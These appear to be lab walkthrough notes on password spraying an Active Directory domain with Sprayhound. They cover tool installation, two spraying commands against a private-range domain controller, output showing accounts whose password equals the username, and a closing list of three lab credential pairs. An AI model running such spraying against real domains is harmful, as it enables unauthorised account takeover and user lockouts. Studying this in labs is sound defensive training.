Password Spraying

Install Sprayhound

sudo apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
git clone https://github.com/Hackndo/sprayhound.git
cd sprayhound
sudo python3 -m pip install -r requirements.txt
sudo aptitude install libsasl2-dev python3-dev libldap2-dev libssl-dev

python3-dev is already installed at the requested version (3.9.2-3)
python3-dev is already installed at the requested version (3.9.2-3)
The following NEW packages will be installed:
  libldap2-dev{b} libsasl2-dev libssl-dev
The following packages will be upgraded:
  libssl1.1
1 packages upgraded, 3 newly installed, 0 to remove and 227 not upgraded.
Need to get 3,999 kB of archives. After unpacking 10.6 MB will be used.
The following packages have unmet dependencies:
 libldap2-dev : Depends: libldap-2.4-2 (= 2.4.57+dfsg-3+deb11u1) but 2.4.59+dfsg-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     libldap2-dev [Not Installed]



Accept this solution? [Y/n/q/?] n
The following actions will resolve these dependencies:

     Downgrade the following packages:
1)     libldap-2.4-2 [2.4.59+dfsg-1~bpo11+1 (now, parrot-backports) -> 2.4.57+dfsg-3+deb11u1 (parrot, parrot-security)]



Accept this solution? [Y/n/q/?] y
The following packages will be DOWNGRADED:
  libldap-2.4-2
The following NEW packages will be installed:
  libldap2-dev libsasl2-dev libssl-dev
The following packages will be upgraded:
  libssl1.1



sudo python3 setup.py install

sprayhound -U users.txt -d north.newyork.local -dc 192.168.56.11 --lower
         
[!] BEWARE ! You are going to test user/pass without providing a valid domain user
[!] Without a valid domain user, tested account may be locked out as we're not able to determine password policy and bad password count
    Continue anyway? [y/N] y
[+] 16 users will be tested
[+] 0 users will not be tested
    Continue? [Y/n] y
[+] [  VALID  ] vagrant : vagrant
[+] [  VALID  ] pacofish : pacofish
[+] 2 user(s) have been owned !
    Do you want to set them as 'owned' in Bloodhound ? [Y/n] n

We could try sprayhound with a valid user to avoid locking account (option -t to set the number of try left)

sprayhound -U users.txt -d north.newyork.local -dc 192.168.56.11 -lu pacofish -lp pacofish --lower -t 2

[+] Login successful
[+] Successfully retrieved password policy (Threshold: 5)
[+] Successfully retrieved 15 users
[+] 15 users will be tested
[+] 0 users will not be tested
    Continue? [Y/n] y
[+] [  VALID  ] vagrant : vagrant
[+] [  VALID  ] pacofish : pacofish
[+] 2 user(s) have been owned !
    Do you want to set them as 'owned' in Bloodhound ? [Y/n] n
[!] Ok, master. Bye.

We now got three couple of credentials

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish